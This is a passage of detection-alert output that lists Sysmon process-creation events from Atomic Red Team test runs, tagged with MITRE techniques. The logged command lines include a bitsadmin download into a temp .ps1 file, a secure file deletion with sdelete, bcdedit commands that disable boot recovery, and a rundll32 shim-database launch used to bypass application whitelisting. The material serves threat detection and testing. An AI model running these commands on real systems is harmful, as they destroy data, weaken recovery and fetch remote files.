<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:30.619</Data>
<Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-0010F0D02E00</Data>
<Data Name=""ProcessId"">752</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /create AtomicBITS&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:22:28.886411Z"">
</TimeCreated>
<EventRecordID>1966541</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:22:28.806</Data>
<Data Name=""ProcessGuid"">365ABB72-5D94-5C91-0000-001080E90F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb</Data>
<Data Name=""CurrentDirectory"">C:\Windows\AppPatch\Custom\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
<Data Name=""ParentProcessId"">2984</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:22:28.886411Z"">
</TimeCreated>
<EventRecordID>1966541</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:22:28.806</Data>
<Data Name=""ProcessGuid"">365ABB72-5D94-5C91-0000-001080E90F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb</Data>
<Data Name=""CurrentDirectory"">C:\Windows\AppPatch\Custom\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
<Data Name=""ParentProcessId"">2984</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.640915,2019-07-19T18:48:30.640915+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:05.365622Z"">
</TimeCreated>
<EventRecordID>3656</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:05.349</Data>
<Data Name=""ProcessGuid"">747F3D96-D825-5D31-0000-0010CF222C00</Data>
<Data Name=""ProcessId"">5808</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:22:28.886411Z"">
</TimeCreated>
<EventRecordID>1966541</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:22:28.806</Data>
<Data Name=""ProcessGuid"">365ABB72-5D94-5C91-0000-001080E90F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb</Data>
<Data Name=""CurrentDirectory"">C:\Windows\AppPatch\Custom\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
<Data Name=""ParentProcessId"">2984</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547684.13141,2019-07-19T18:48:04.131410+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:04.103366Z"">
</TimeCreated>
<EventRecordID>3654</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:04.094</Data>
<Data Name=""ProcessGuid"">747F3D96-D824-5D31-0000-001023F42B00</Data>
<Data Name=""ProcessId"">6736</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547684.103366,2019-07-19T18:48:04.103366+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:57.274199Z"">
</TimeCreated>
<EventRecordID>3653</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:57.265</Data>
<Data Name=""ProcessGuid"">747F3D96-D81D-5D31-0000-0010D7CD2B00</Data>
<Data Name=""ProcessId"">7080</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547677.274199,2019-07-19T18:47:57.274199+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sdelete.exe C:\some\file.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:57.227966Z"">
</TimeCreated>
<EventRecordID>3652</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:57.189</Data>
<Data Name=""ProcessGuid"">747F3D96-D81D-5D31-0000-0010B8CA2B00</Data>
<Data Name=""ProcessId"">1632</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sdelete.exe C:\some\file.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547677.227966,2019-07-19T18:47:57.227966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:52.046322Z"">
</TimeCreated>
<EventRecordID>3651</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:51.972</Data>
<Data Name=""ProcessGuid"">747F3D96-D817-5D31-0000-0010C8BA2B00</Data>
<Data Name=""ProcessId"">7040</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547672.010791,2019-07-19T18:47:52.010791+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} recoveryenabled no&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:51.997980Z"">
</TimeCreated>
<EventRecordID>3649</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:51.899</Data>
<Data Name=""ProcessGuid"">747F3D96-D817-5D31-0000-001049B42B00</Data>
<Data Name=""ProcessId"">6216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} recoveryenabled no&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547671.865963,2019-07-19T18:47:51.865963+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:51.816821Z"">
</TimeCreated>
<EventRecordID>3647</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:51.784</Data>
<Data Name=""ProcessGuid"">747F3D96-D817-5D31-0000-001064AD2B00</Data>
<Data Name=""ProcessId"">6508</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
